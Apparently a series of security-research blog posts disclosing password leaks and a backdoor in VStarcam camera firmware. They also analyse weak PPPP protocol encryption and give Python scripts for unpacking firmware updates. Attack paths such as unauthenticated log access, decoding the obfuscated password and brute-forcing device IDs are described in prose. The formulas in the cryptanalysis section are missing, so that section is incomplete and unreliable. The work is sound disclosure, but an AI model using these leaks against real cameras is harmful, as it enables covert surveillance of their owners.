In addition to the logging calls where the password leaks as a (possibly unintended) side-effect, some logging calls are specifically designed to write the device password to the log. For example, the function GetUserPri meant to handle authentication when dual authentication isn’t enabled will often do something like this on a failed login attempt:
LogSystem_WriteLog("sysparamapp.c", "GetUserPri", 177, 0,
"loginuse=%s&loginpas=%s&user=admin&pwd=888888&", gUser, gPassword);
These aren’t the parameters of a received login attempt but rather what the parameters should look like for the request to succeed. And if the attacker enabled log access for their connection they will get the device credentials handed on a silver platter – without even having to wait for the device owner to connect.
If dual authentication is enabled, function GetUserPri_doubleVerify often contains a similar call:
LogSystem_WriteLog("web.c", "GetUserPri_doubleVerify", 536, 0,
"pri[%d] system OwnerPwd[%s] app Pwd[%s]",
pri, gOwnerPassword, gAppPassword);
What got me confused at first were the firmware versions that would log the “correct” password on failed authentication attempts but lacked the capability for unauthenticated log access. When I looked closer I found the function DoSendLogToNodeServer. The firmware receives a “node configuration” from a server which includes a “push IP” and the corresponding port number. It then opens a persistent TCP connection to that address (unencrypted of course), so that DoSendLogToNodeServer can send messages to it.
Despite the name this function doesn’t upload all of the application logs. There are only three to four DoSendLogToNodeServer calls in the firmware versions I looked at, and two are invariably found in function P2pCgiParamFunction, in code running on first failed authentication attempt:
sprintf(buffer,"password error [doublePwd][%s], [PassWd][%s]", gOwnerPassword, gPassword);
DoSendLogToNodeServer(request);
DoSendLogToNodeServer(buffer);
This is sending both the failed authentication request and the correct passwords to a VStarcam server. So while the password isn’t being leaked here to everybody who knows how to ask, it’s still being leaked to VStarcam themselves. And anybody who is eavesdropping on the device’s traffic of course.
A few firmware versions have log upload functionality in a function called startUploadLogToServer, here really all logging output is being uploaded to the server. This one isn’t called unconditionally however but rather enabled by the setLogUploadEnable.cgi endpoint. An endpoint which, you guessed it, can be accessed without authentication. But at least these firmware versions don’t seem to have any explicit password logging, only the “regular” logging of requests.
With some considerable effort all of the above could be explained as debugging functionality which was mistakenly shipped to production. VStarcam wouldn’t be the first company to fail realizing that functionality labeled “for debugging purposes only” will still be abused if released with the production build of their software. But I found yet another password leak which can only be described as a backdoor.
At some point VStarcam introduced a second version of their get_online_log.cgi API. When that second version is requested the device will respond with something like:
result=0;
index=12345678;
str=abababababab;
The result=0 part is typical and indicates that authentication (or lack thereof in this case) was successful. The other two values are unusual, and eventually I decided to check what they were about. Turned out, str is a hex-encoded version of the device password after it was XOR’ed with a random byte. And index is an obfuscated representation of that byte.
I can only explain it like this: somebody at VStarcam thought that leaking passwords via log output was too obvious, people might notice. So they decided to expose the device password in a more subtle way, one that only they knew how to decode (unless somebody notices this functionality and spends two minutes studying it in the firmware).
Mind you, even though this is clearly a backdoor I’m still not ruling out incompetence. Maybe VStarcam made a large enough mess with their dual authentication that their customer support needs to recover device access on a regular basis. However, they do have device reset functionality that should normally be used for this scenario.
In the end, for their customers it doesn’t matter what the intention was. The result is a device that cannot be trusted with protecting access. For a security camera this is an unforgivable flaw.
Now we are coming to the tough questions. Why do some firmware versions have this backdoor functionality while others don’t? When was this introduced? In what order? What is the current state of affairs?
You might think that after compiling the data on 367 firmware versions the answers would be obvious. But the data is so inconsistent that any conclusions are really difficult. Thing is, we aren’t dealing with a single evolving codebase here. We aren’t even dealing with two codebases or a dozen of them. 367 firmware versions are 367 different codebases. These codebases are related, they share some code here and there, but they are all being developed independently.
I’ve seen this development model before. What VStarcam appears to be doing is: for every new camera model they take some existing firmware and fork it. They adjust that firmware for the new hardware, they probably add new features as well. None of this work makes it into the original firmware unless it is explicitly backported. And since VStarcam is maintaining hundreds of firmware variants, the older ones are usually only receiving maintenance changes if any at all.
To make this mess complete, VStarcam’s firmware version numbers don’t make any sense at all. And I don’t mean the fact that VStarcam releases the same camera under 30 different model names, so there is no chance of figuring out the model to firmware version mapping. It’s also the firmware version numbers themselves.
As I’ve already mentioned, the last part of the firmware version is the build number, increased with each release. The first part is the vendor ID: firmware versions starting with 48 are VStarcam’s global releases whereas 66 is reserved for their Russian distributor (or rather was I think). Current VStarcam firmware is usually released with vendor ID 10 however, standing for… who knows, VeePai maybe? This leaves the two version parts in between, and I couldn’t find any logic here whatsoever. Like, firmware versions sharing the third part of the version number would sometimes be closely related, but only sometimes. At the same time the second part of the version number is supposed to represent the camera model, but that’s clearly not always correct either.
I ended up extracting all the logging calls from all the firmware versions and using that data to calculate a distance between every firmware version pair. I then fed this data into GraphViz and asked it to arrange the graph for me. It gave me the VStarcam spiral galaxy:
Click the image above to see the larger and slightly interactive version (it shows additional information when the mouse pointer is at a graph node). The green nodes are the ones that don’t allow access to device logs. Yellow are the ones providing unauthenticated log access, always logging incoming requests including their password parameters. The orange ones have additional logging that exposes the correct password on failed authentication attempts – or they call DoSendLogToNodeServer function to send the correct password to a VStarcam server. The red ones have the backdoor in the get_online_log.cgi API leaking passwords. Finally pink are the ones which pretend to improve things by censoring parameters of logged requests – yet all of these without exception leak the password via the backdoor in the get_online_log.cgi API.
Note: Firmware version 10.165.19.37 isn’t present in the graph because it is somehow based on an entirely different codebase with no relation to the others. It would be red in the graph however, as the backdoor has been implemented here as well.
Not only does this graph show the firmware versions as clusters, it’s also possible to approximately identify the direction of time for each cluster. Let’s add cluster names and time arrows to the image:
Of course this isn’t a perfect representation of the original data, and I wasn’t sure whether it could be trusted. Are these clusters real or merely an artifact produced by the graph algorithm? I verified things manually and could confirm that the clusters are in fact distinctly different on the technical level, particularly when considering updates format:
With the firmware versions ordered like this I could finally make some conclusions about the introduction of the problematic features:
get_online_log.cgi API was introduced in cluster B around 2022.DoSendLogToNodeServer function, sending the correct password to a VStarcam server on first failed login attempt.get_online_log.cgi backdoor start popping up here, and these have all other password leaks removed. These even censor passwords in logged request parameters. Either there were security considerations at play or the other ways to expose the password were considered unnecessary at this point and too obvious.get_online_log.cgi backdoor, it was introduced here around 2024. Unlike with cluster E this backdoor didn’t replace the existing password leaks here but only complemented them. In fact, while cluster F was initially “censoring” parameters so that logged requests wouldn’t leak passwords, this measure appears to have been dropped later in 2024. Current cluster F firmware tends to have all the issues described in this post simultaneously. Whatever security considerations may have driven the changes in cluster E, the people in charge of cluster F clearly disagreed.So, how bad is it? Knowing the access password allows access to the camera’s main functionality: audio and video recordings. But these cameras have been known for vulnerabilities allowing execution of arbitrary commands. Also, newer cameras have an API that will start a telnet server with hardcoded and widely known administrator credentials (older cameras had this telnet server start by default). So we have to assume that a compromised camera could become part of a botnet or be used as a starting point for attacks against a network.
But this requires accessing the camera first, and most VStarcam cameras won’t be exposed to the internet directly. They will only be reachable via the PPPP protocol. And for that the attackers would need to know the device ID. How would they get it?
There is a number of ways, most of which I’ve already discussed before. For example, anybody who was briefly connected to your network could have collected device IDs of your cameras. The script to do that won’t currently work with newer VStarcam cameras because these obfuscate the traffic on the PPPP level but the necessary adjustments aren’t exactly complicated.
PPPP networks still support “supernodes,” devices that help route traffic. Back in 2019 Paul Marrapese abused that functionality to register a rogue supernode and collect device IDs en masse. There is no indication that this trick stopped working, and the VStarcam networks are likely susceptible as well.
Users also tend to leak their device IDs themselves. They will post screenshots or videos of the app’s user interface. On the first glance this is less problematic with the O-KAM Pro app because this one will display only a vendor-specific device ID (looks similar to a PPPP device ID but has seven digits and only four letters in the verification code). That is, until you notice that the app uses a public web API to translate vendor-specific device IDs into PPPP device IDs.
Anybody who can intercept some PPPP traffic can extract the device IDs from it. Even when VStarcam networks obfuscate the traffic rather than using plaintext transmission – the static keys are well known, removing the obfuscation isn’t hard.
And finally, simply guessing device IDs is still possible. With only 5 million possible verification codes for each device IDs and servers not implementing rate limiting, bruteforce attacks are quite realistic.
Let’s not forget the elephant in the room however: VStarcam themselves know all the device IDs of course. Not just that, they know which devices are active and where. With a password they can access the cameras of interest to them (or their government) anytime.
Given the intentional nature of these issues, I was unsure how to deal with this. I mean, what’s the point of reporting vulnerabilities to VStarcam that they are clearly aware of? In the end I decided to give them a chance to address the issues before they become public knowledge.
However, all I found was VStarcam boasting about their ISO 27001:2022 compliance. My understanding is that this requires them to have a dedicated person responsible for vulnerability management, but they are not obliged to list any security contact that can be reached from outside the company – and so they don’t. I ended up emailing all company addresses I could find, asking whether there is any way to report security issues to them.
I haven’t received any response, an experience that in my understanding other people already made with VStarcam. So I went with my initial publication schedule rather than waiting 90 days as I would normally do.
Whatever motives VStarcam had to backdoor their cameras, the consequence for the customers is: these cameras cannot be trusted. Their access protection should be considered compromised. Even with firmware versions shown as green on my map, there is no guarantee that I haven’t missed something or that these will still be green after the next update.
If you want to keep using a VStarcam camera, the only safe way to do it is disconnecting it from the internet. They don’t have to be disconnected physically, internet routers will often have a way to prohibit internet traffic to and from particular devices. My router for example has this feature under parental control.
Of course this will mean that you will only be able to control your camera while connected to the same network. It might be possible to explicitly configure port forwarding for the camera’s RTSP port, allowing you to access at least the video stream from outside. Just make sure that your RTSP password isn’t known to VStarcam.
My first article on the PPPP protocol already said everything there was to say about PPPP “encryption”:
So this thing is completely broken, why look any further? There is at least one situation where you don’t know the app being used so you cannot extract the key and you don’t have any traffic to analyze either. It’s when you are trying to scan your local network for potential hidden cameras.
This script will currently only work for cameras using plaintext communication. Other cameras expect a properly encrypted “LAN search” packet and will ignore everything else. How can this be solved without listing all possible keys in the script? By sending all possible ciphertexts of course!
TL;DR: What would be completely ridiculous with any reasonable protocol turned out to be quite possible with PPPP. There are at most 157,092 ways in which a “LAN search” packet can be encrypted. I’ve opened a pull request to have the PPPP device detection script adjusted.
Note: Cryptanalysis isn’t my topic, I am by no means an expert here. These issues are simply too obvious.
The key which is specified as part of the app’s “init string” is not being used for encryption directly. Nor is it being fed into any of the established key stretching algorithms. Instead, a key represented by the byte sequence is mapped to four bytes that become the effective key. These bytes are calculated as follows ( means rounding down, stands for the bitwise XOR operation):
In theory, a 4 byte long effective key means possible values. But that would only be the case if these bytes were independent of each other.
Of course the bytes of the effective key are not independent. This is most obvious with which is completely determined by :
This means that we can ignore , bringing the number of possible effective keys down to .
Now let’s have a look at the relationship between and . Addition and bitwise XOR operations are very similar, the latter merely ignores carry. This difference affects all the bits of the result but the lowest one, no carry to be considered here. This means that the lowest bits of and are always identical. So has only 128 possible values for any value of , bringing the total number of effective keys down to .
And that’s how far we can get considering only redundancies. It can be shown that a key can be constructed resulting in any combination of and values. Similarly, it can be shown that any combination of and is possible as long as the lowest bit is identical.
But the keys we are dealing with here aren’t arbitrary bytes. These aren’t limited to alphanumeric characters, some keys also contain punctuation, but they are all invariably limited to the ASCII range. And that means that the highest bit is never set in any of the values.
Which in turn means that the highest bit is never set in due to the nature of the bitwise XOR operation. We can once again rule out half of the effective keys, for any given value of there are only 64 possible values of . We now have possible effective keys.
Now let’s have a thorough look at how relates to , ignoring the modulo operation at first. We are taking one third of each byte, rounding it down and summing that up. What if we were to sum up first and round down at the end, how would that relate? Well, it definitely cannot be smaller than rounding down in each step, so we have an upper bound here.
How much smaller can the left side get? Each time we round down this removes at most two thirds, and we do this times. So altogether these rounding operations reduce the result by at most . This gives us a lower bound:
If is arbitrary these bounds don’t help us at all. But isn’t arbitrary, the keys used for PPPP encryption tend to be fairly short. Let’s say that we are dealing with keys of length 16 at most which is a safe bet. If we know the sum of the bytes these bounds allow us to narrow down to possible values.
But we don’t know the sum of bytes. What we have is which is that sum modulo 256, and the sum is actually where is some nonnegative integer. How large can get? Remembering that we are dealing with ASCII keys, each byte has at most the value 127. And we have at most 16 bytes. So the sum of bytes cannot be higher than (or 7F0 in hexadecimal). Consequently, is 7 at most.
Let’s write down the bounds for now:
We have to consider this for eight possible values of . Wait, do we really?
Once we move into modulo 256 space again, the part of our bounds (which is the only part dependent on ) will assume the same value after every three values. So only three values of are really relevant, say 0, 1 and 2. Meaning that for each value of we have possible values for .
This gives us as the number of possible effective keys. My experiments with random keys indicate that this should be pretty much as far down as it goes. There may still be more edge conditions rendering some effective keys impossible, but if these exist their impact is insignificant.
Not all effective keys are equally likely however, the values at the outer edges of the possible range are very unlikely. So one could prioritize the keys by probability – if the total number weren’t already low enough to render this exercise moot.
We have the four byte plaintext F1 30 00 00 and we have 540,672 possible effective keys. How many ciphertexts does this translate to? With any reasonable encryption scheme the answer would be: slightly less than 540,672 due to a few unlikely collisions which could occur here.
But PPPP doesn’t use a reasonable encryption scheme. With merely four bytes of plaintext there is a significant chance that PPPP will only use part of the effective key for encryption, resulting in identical ciphertexts for every key sharing that part. I didn’t bother analyzing this possibility mathematically, my script simply generated all possible ciphertexts. So the exact answer is: 540,672 effective keys produce 157,092 ciphertexts.
And that’s why you should leave cryptography to experts.
Now let’s say we send 157,092 encrypted requests. An encrypted response comes back. How do we decrypt it without knowing which of the requests was accepted?
All PPPP packets start with the magic byte F1, so the first byte of our response’s plaintext must be F1 as well. The “encryption” scheme used by PPPP allows translating that knowledge directly into the value of . Now one could probably (definitely) guess more plaintext parts and with some clever tricks deduce the rest of the effective key. But there are only possible effective keys for each value of anyway. It’s much easier to simply try out all 2,112 possibilities and see which one results in a response that makes sense.
The response here is 24 bytes large, making ambiguous decryptions less likely. Still, my experiments show that in approximately 4% of the cases closely related keys will produce valid but different decryption results. So you will get two or more similar device IDs and any one of them could be correct. I don’t think that this ambiguity can be resolved without further communication with the device, but at least with my changes the script reliably detects when a PPPP device is present on the network.
One important player in the PPPP protocol business is VStarcam. At the very least they’ve already accumulated an impressive portfolio of security issues. Like exposing system configuration including access password unprotected in the Web UI (discovered by multiple people independently from the look of it). Or the open telnet port accepting hardcoded credentials (definitely discovered by lots of people independently). In fact, these cameras have been seen used as part of a botnet, likely thanks to some documented vulnerabilities in their user interface.
Is that a thing of the past? Are there updates fixing these issues? Which devices can be updated? These questions are surprisingly hard to answer. I found zero information on VStarcam firmware versions, available updates or security fixes. In fact, it doesn’t look like they ever even acknowledged learning about the existence of these vulnerabilities.
No way around downloading these firmware updates and having a look for myself. With surprising results. First of all: there are lots of firmware updates. It seems that VStarcam accumulated a huge number of firmware branches. And even though not all of them even have an active or downloadable update, the number of currently available updates goes into hundreds.
And the other aspect: the variety of update formats is staggering, and often enough standard tools like binwalk aren’t too useful. It took some time figuring out how to unpack some of the more obscure variants, so I’m documenting it all here.
Warning: Lots of quick-and-dirty Python code ahead. Minimal error checking, use at your own risk!
These incremental updates don’t contain an image of the entire system, only the files that need updating. They always contain the main application however, which is what matters.
Recognizing this format is easy, the files start with the 32 bytes www.object-camera.com.by.hongzx. or www.veepai.com/design.rock-peng. (the old and the new variant respectively). The files end with the same string in reverse order. Everything in between is a sequence of ZIP files, with each file packed in its own ZIP file.
Each ZIP file is preceded by a 140 byte header: 64 byte directory name, 64 byte file name, 4 byte ZIP file size, 4 byte timestamp of some kind and 4 zero bytes. While binwalk can handle this format, having each file extracted into a separate directory structure isn’t optimal. A simple Python script can do better:
#!/usr/bin/env python3
import datetime
import io
import struct
import os
import sys
import zipfile
def unpack_zip_stream(input: io.BytesIO, targetdir: str) -> None:
targetdir = os.path.normpath(targetdir)
while True:
header = input.read(0x8c)
if len(header) < 0x8c:
break
_, _, size, _, _ = struct.unpack('<64s64sLLL', header)
data = input.read(size)
with zipfile.ZipFile(io.BytesIO(data)) as archive:
for member in archive.infolist():
path = os.path.normpath(
os.path.join(targetdir, member.filename)
)
if os.path.commonprefix((path, targetdir)) != targetdir:
raise Exception('Invalid target path', path)
try:
os.makedirs(os.path.dirname(path))
except FileExistsError:
pass
with archive.open(member) as member_input:
data = member_input.read()
with open(path, 'wb') as output:
output.write(data)
time = datetime.datetime(*member.date_time).timestamp()
os.utime(path, (time, time))
if __name__ == '__main__':
if len(sys.argv) != 3:
print(f'Usage: {sys.argv[0]} in-file target-dir', file=sys.stderr)
sys.exit(1)
if os.path.exists(sys.argv[2]):
raise Exception('Target directory exists')
with open(sys.argv[1], 'rb') as input:
header = input.read(32)
if (header != b'www.object-camera.com.by.hongzx.' and
header != b'www.veepai.com/design.rock-peng.'):
raise Exception('Wrong file format')
unpack_zip_stream(input, sys.argv[2])
This format is pretty simple. There is an identical section starting with VSTARCAM_PACK_SYSTEM_HEAD and ending with VSTARCAM_PACK_SYSTEM_TAIL at the start and at the end of the file. This section seems to contain a payload size and its MD5 hash.
There are two types of payload here. One is a raw SquashFS image starting with hsqs. These seem to be updates to the base system: they contain an entire Linux root filesystem and the Web UI root but not the actual application. The matching application lives on a different partition and is likely delivered via incremental updates.
The other variant seems to be used for hardware running LiteOS rather than Linux. The payload here starts with a 16 byte header: compressed size, uncompressed size and an 8 byte identification of the compression algorithm. The latter is usually gziphead, meaning standard gzip compression. After uncompressing you get a single executable binary containing the entire operating system, drivers, and the actual application.
So far binwalk can handle all these files just fine. I found exactly one exception, firmware version 48.60.30.22. It seems to be another LiteOS-based update but the compression algorithm field is all zeroes. The actual compressed stream has some distinct features that make it look like none of the common compression algorithms.
Well, I had to move on here, so that’s the one update file I haven’t managed to unpack.
This is a format that seems to be used by newer VStarcam hardware. At offset 8 these files contain a firmware version like www.veepai.com-10.201.120.54. Offsets of the payload vary but it is a SquashFS image, so binwalk can be used to find and unpack it.
Normally these are updates for the partition where the VStarcam application resides in. In a few cases these are updating the Linux base system however, no application-specific files from what I could tell.
This format seems to be specific to the Ingenic hardware platform, and I’ve seen other hardware vendors use it as well. One noticeable feature here is the presence of a tag partition containing various data sections, e.g. the CMDL section encoding Linux kernel parameters.
In fact, looking for that tag partition within the update might be helpful to recognize the format. While the update files usually start with the 11 22 33 44 magic bytes, they sometimes start with a different byte combination. There is always the firmware version at offset 8 in the file however.
The total size of the file header is 40 bytes. It is followed by a sequence of partitions, each preceded by a 16 byte header where bytes 1 to 4 encode the partition index and bytes 9 to 12 the partition size.
Binwalk can recognize and extract some partitions but not all of them. If you prefer having all partitions extracted you can use a simple Python script:
#!/usr/bin/env python3
import io
import struct
import os
import sys
def unpack_ingenic_update(input: io.BytesIO, targetdir: str) -> None:
os.makedirs(targetdir)
input.read(40)
while True:
header = input.read(16)
if len(header) < 16:
break
index, _, size, _ = struct.unpack('<LLLL', header)
data = input.read(size)
if len(data) < size:
raise Exception(f'Unexpected end of data')
path = os.path.join(targetdir, f'mtdblock{index}')
with open(path, 'wb') as output:
output.write(data)
if __name__ == '__main__':
if len(sys.argv) != 3:
print(f'Usage: {sys.argv[0]} in-file target-dir', file=sys.stderr)
sys.exit(1)
with open(sys.argv[1], 'rb') as input:
unpack_ingenic_update(input, sys.argv[2])
You will find some partitions rather tricky to unpack however.
Some partitions contain a file name at offset 34, typically rootfs_camera.cpio. These are LZO-compressed but lack the usual magic bytes. Instead, the first four bytes contain the size of compressed data in this partition. Once you replace these four bytes by 89 4c 5a 4f (removing trailing junk is optional) the partition can be uncompressed with the regular lzop tool and the result fed into cpio to get the individual files.
Other Ingenic root partitions are more tricky. These also start with the data size but it is followed by the bytes 56 19 05 27 (that’s a uImage signature in reversed byte order). After that comes a compressed stream that sort of looks like LZMA but isn’t LZMA. What’s more: while binwalk will report that the Linux kernel is compressed via LZ4, it’s actually the same strange compression mechanism. The bootloader of these systems pre-dates the introduction of LZ4, so the same compression algorithm identifier was used for this compression mechanism that was later assigned to LZ4 by the upstream version of the bootloader.
What kind of compression is this? I’ve spent some time analyzing the bootloader but it turned out to be a red herring: apparently, the decompression is performed by hardware here, and the bootloader merely pushes the data into designated memory areas. Ugh!
At least the bootloader told me how it is called: jzlzma, which is apparently Ingenic’s proprietary LZMA variant. An LZMA header starts with a byte encoding some compression properties (typically 5D), a 4 byte dictionary size and an 8 byte uncompressed size. Ingenic’s header is missing compression properties, and the uncompressed size is merely 4 bytes. But even accounting for these differences the stream cannot be decompressed with a regular LZMA decoder.
Luckily, with the algorithm name I found tools on Github that are meant to create firmware images for the Ingenic platform. These included an lzma binary which turned out to be an actual LZMA tool from 2005 hacked up to produce a second compressed stream in Ingenic’s proprietary format.
As I found, Ingenic’s format has essentially two differences to regular LZMA:
That second difference essentially turns LZMA into LZ77. Clearly, the issue here was the complexity of implementing probabilistic range coding in hardware. Of course, that change makes the resulting algorithm produce considerably worse compression ratios than LZMA and even worse than much simpler LZ77-derived algorithms like deflate. And there is plenty of hardware to do deflate decompression. But at least they managed to obfuscate the data…
My original thought was “fixing” their stream and turning it into proper LZMA. But range coding is not only complex but also context-dependent, it cannot be done without decompressing. So I ended up just writing the decompression logic in Python which luckily was much simpler than doing the same thing for LZMA proper.
Note: The following script is minimalistic and wasn’t built for performance. Also, it expects a file that starts with a dictionary size (typically the bytes 00 00 01 00), so if you have some header preceding it you need to remove it first. It will also happily “uncompress” any trailing junk you might have there.
#!/usr/bin/env python3
import sys
kStartPosModelIndex, kEndPosModelIndex, kNumAlignBits = 4, 14, 4
def reverse_bits(n, bits):
reversed = 0
for i in range(bits):
reversed <<= 1
if n & (1 << i):
reversed |= 1
return reversed
def bit_stream(data):
for byte in data:
for bit in range(8):
yield 1 if byte & (1 << bit) else 0
def read_num(stream, bits):
num = 0
for _ in range(bits):
num = (num << 1) | next(stream)
return num
def decode_length(stream):
if next(stream) == 0:
return read_num(stream, 3) + 2
elif next(stream) == 0:
return read_num(stream, 3) + 10
else:
return read_num(stream, 8) + 18
def decode_dist(stream):
posSlot = read_num(stream, 6)
if posSlot < kStartPosModelIndex:
pos = posSlot
else:
numDirectBits = (posSlot >> 1) - 1
pos = (2 | (posSlot & 1)) << numDirectBits
if posSlot < kEndPosModelIndex:
pos += reverse_bits(read_num(stream, numDirectBits), numDirectBits)
else:
pos += read_num(stream, numDirectBits -
kNumAlignBits) << kNumAlignBits
pos += reverse_bits(read_num(stream, kNumAlignBits), kNumAlignBits)
return pos
def jzlzma_decompress(data):
stream = bit_stream(data)
reps = [0, 0, 0, 0]
decompressed = []
try:
while True:
if next(stream) == 0: # LIT
byte = read_num(stream, 8)
decompressed.append(byte)
else:
size = 0
if next(stream) == 0: # MATCH
size = decode_length(stream)
reps.insert(0, decode_dist(stream))
reps.pop()
elif next(stream) == 0:
if next(stream) == 0: # SHORTREP
size = 1
else: # LONGREP[0]
pass
elif next(stream) == 0: # LONGREP[1]
reps.insert(0, reps.pop(1))
elif next(stream) == 0: # LONGREP[2]
reps.insert(0, reps.pop(2))
else: # LONGREP[3]
reps.insert(0, reps.pop(3))
if size == 0:
size = decode_length(stream)
curLen = len(decompressed)
start = curLen - reps[0] - 1
while size > 0:
end = min(start + size, curLen)
decompressed.extend(decompressed[start:end])
size -= end - start
except StopIteration:
return bytes(decompressed)
if __name__ == '__main__':
if len(sys.argv) != 3:
print(f'Usage: {sys.argv[0]} in-file.jzlzma out-file', file=sys.stderr)
sys.exit(1)
with open(sys.argv[1], 'rb') as input:
data = input.read()
data = jzlzma_decompress(data[8:])
with open(sys.argv[2], 'wb') as output:
output.write(data)
The uncompressed root partition can be fed into the regular cpio tool to get the individual files.
There was one update using a completely different format despite also being meant for the Ingenic hardware. This one started with the bytes a5 ef fe 5a and had a SquashFS image at offset 0x3000. The unpacked contents (binwalk will do) don’t look like any of the other updates either: this definitely isn’t a camera, and it doesn’t have a PPPP implementation. Given the HDMI code I can only guess that this is a Network Video Recorder (NVR).
As to those security issues I am glad to report that VStarcam solved the telnet issue:
export PATH=/system/system/bin:$PATH
#telnetd
export LD_LIBRARY_PATH=/system/system/lib:/mnt/lib:$LD_LIBRARY_PATH
mount -t tmpfs none /tmp -o size=3m
/system/system/bin/brushFlash
/system/system/bin/updata
/system/system/bin/wifidaemon &
/system/system/bin/upgrade &
Yes, their startup script really has telnetd call commented out. At least that’s usually the case. There are updates from 2018 that are no longer opening the telnet port. There are other updates from 2025 that still do. Don’t ask me why. From what I can tell the hardcoded administrator credentials are still universally present but these are only problematic with the latter group.
It’s a similar story with the system.ini file that was accessible without authentication. Some firmware versions had this file moved to a different directory, others still have it in the web root. There is no real system behind it, and I even doubt that this was a security-induced change rather than an adjustment to a different hardware platform.
My previous article on IoT “P2P” cameras couldn’t go into much detail on the PPPP protocol. However, there is already lots of security research on and around that protocol, and I have a feeling that there is way more to come. There are pieces of information on the protocol scattered throughout the web, yet every one approaching from a very specific narrow angle. This is my attempt at creating an overview so that other people don’t need to start from scratch.
While the protocol can in principle be used by any kind of device, it is mostly being used for network-connected cameras. It isn’t really peer-to-peer as advertised but rather relies on central servers, yet the protocol allows to transfer the bulk of data via a direct connection between the client and the device. It’s hard to tell how many users there are but there are lots of apps, I’m sure that I haven’t found all of them.
There are other protocols with similar approaches being used for the same goal. One is used by ThroughTek’s Kalay Platform which has the interesting string “Charlie is the designer of P2P!!” in its codebase (32 bytes long, seems to be used as “encryption” key for some non-critical functionality). I recognize both the name and the “handwriting,” it looks like PPPP protocol designer found a new home here. Yet PPPP seems to be still more popular than the competition, thanks to it being the protocol of choice for cheap low-end cameras.
Disclaimer: Most of the information below has been acquired by analyzing public information as well as reverse engineering applications and firmware, not by observing live systems. Consequently, there can be misinterpretations.
The protocol’s goal is to serve as a drop-in replacement for TCP. Rather than establish a connection to a known IP address (or a name to be resolved via DNS), clients connect to a device identifier. The abstraction is supposed to hide away how the device is located (via a server that keeps track of its IP address), how a direct communication channel is established (via UDP hole punching) or when one of multiple possible fallback scenarios is being used because direct communication is not possible.
The protocol is meant to be resilient, so there are usually three redundant servers handling each network. When a device or client needs to contact a server, it sends the same message to all of them and doesn’t care which one will reply. Note: In this article “network” generally means a PPPP network, i.e. a set of servers and the devices connecting to them. While client applications typically support multiple networks, devices are always associated with a specific one determined by their device prefix.
For what is meant to be a transport layer protocol, PPPP has some serious complexity issues. It encompasses device discovery on the LAN via UDP broadcasts, UDP communication between device/client and the server and a number of (not exactly trivial) fallback solutions. It also features multiple “encryption” algorithms which are more correctly described as obfuscators and network management functionality.
Paul Marrapese’s Wireshark Dissector provides an overview of the messages used by the protocol. While it isn’t quite complete, a look into the pppp.fdesc file shows roughly 70 different message types. It’s hard to tell how all these messages play together as the protocol has not been designed as a state machine. The protocol implementation uses its previous actions as context to interpret incoming messages, but it has little indication as to which messages are expected when. Observing a running system is essential to understanding this protocol.
The complicated message exchange required to establish a connection between a device and a client has been described by Elastic Security Labs. They also provide the code of their client which implements that secret handshake.
I haven’t seen any descriptions of how the fallback approaches work when a direct connection cannot be established. Neither could I observe these fallbacks in action, presumably because the network I observed didn’t enable them. There are at least three such fallbacks: UDP traffic can be relayed by a network-provided server, it can be relayed by a “supernode” which is a device that agreed to be used as a relay, and it can be wrapped in a TCP connection to the server. The two centralized solutions incur significant costs for the network owners, rendering them unpopular. And I can imagine the “supernode” approach to be less than reliable with low-end devices like these cameras (it’s also a privacy hazard but this clearly isn’t a consideration).
I recommend going though the CS2 sales presentation to get an idea of how the protocol is meant to work. Needless to say that it doesn’t always work as intended.
I could identify the following network ports being used:
Note that while port 443 is normally associated with HTTPS, here it was apparently only chosen to fool firewalls. The traffic is merely obfuscated, not really encrypted.
The direct communication between the client and the device uses a random UDP port. In my understanding the ports are also randomized when this communication is relayed by a server or supernode.
The canonical representation of a device ID looks like this: ABC-123456-VWXYZ. Here ABC is a device prefix. While a PPPP network will often handle more than one device prefix, mapping a device prefix to a set of servers is supposed to be unambiguous. This rule isn’t enforced across different protocol variants however, e.g. the device prefix EEEE is assigned differently by CS2 and iLnk.
The six digit number following the device prefix allows distinguishing different devices within a prefix. It seems that vendors can choose these numbers freely – some will assign them to devices sequentially, others go by some more complicated rules. A comment on my previous article even claims that they will sometimes reassign existing device IDs to new devices.
The final part is the verification code, meant to prevent enumeration of devices. It is generated by some secret algorithm and allows distinguishing valid device IDs from invalid ones. At least one such algorithm got leaked in the past.
Depending on the application a device ID will not always be displayed in its canonical form. It’s pretty typical for the dashes to be removed for example, in one case I saw the prefix being shortened to one letter. Finally, there are applications that will hide the device ID from the user altogether, displaying only some vendor-specific ID instead.
So far I could identify at least four variants of this protocol – if you count HLP2P which is questionable. These protocol implementations differ significantly and aren’t really compatible. A number of apps can work with different protocol implementations but they generally do it by embedding multiple client libraries.
| Variant | Typical client library names | Typical functions |
|---|---|---|
| CS2 Network | libPPCS_API.so libobject_jni.so librtapi.so | PPPP_Initialize PPPP_ConnectByServer |
| Yi Technology | PPPP_API.so libmiio_PPPP_API.so | PPPP_Initialize PPPP_ConnectByServer |
| iLnk | libvdp.so libHiChipP2P.so | XQP2P_Initialize XQP2P_ConnectByServer HI_XQ_P2P_Init |
| HLP2P | libobject_jni.so libOKSMARTPPCS.so | HLP2P_Initialize HLP2P_ConnectByServer |
The Chinese company CS2 Network is the original developer of the protocol. Their implementation can sometimes be recognized without even looking at any code just by their device IDs. The letters A, I, O and Q are never present in the verification code, there are only 22 valid letters here. Same seems to apply to the Yi Technology fork however which is generally very similar.
The other giveaway is the “init string” which encodes network parameters. Typically these init strings are hardcoded in the application (sometimes hundreds of them) and chosen based on device prefix, though some applications retrieve them from their servers. These init strings are obfuscated, with the function PPPP_DecodeString doing the decoding. The approach is typical for CS2 Network: a lookup table filled with random values and some random algebraic operations to make things seem more complex. The init strings look like this:
DRFTEOBOJWHSFQHQEVGNDQEXFRLZGKLUGSDUAIBXBOIULLKRDNAJDNOZHNKMJO:SECRETKEY
The part before the colon decodes into:
127.0.0.1,192.168.1.1,10.0.0.1,
This is a typical list of three server IPs. No, the trailing comma isn’t a typo but required for correct parsing. Host names are occasionally used in init strings but this is uncommon. With CS2 Network generally distrusting DNS from the looks of it, they probably recommend vendors to sidestep it. The “secret” key behind the colon is optional and activates encryption of transferred data which is better described as obfuscation. Unlike the server addresses, this part isn’t obfuscated.
The Xiaomi spinoff Yi Technology appears to have licensed the code of the CS2 Network implementation. It still uses much of the code of the original, such as the function decoding init strings. The lookup table is different here however, so that the same init string as above would look slightly differently:
LZERHWKWHUEQKOFUOREPNWERHLDLDYFSGUFOJXIXJMASBXANOTHRAFMXNXBSAM
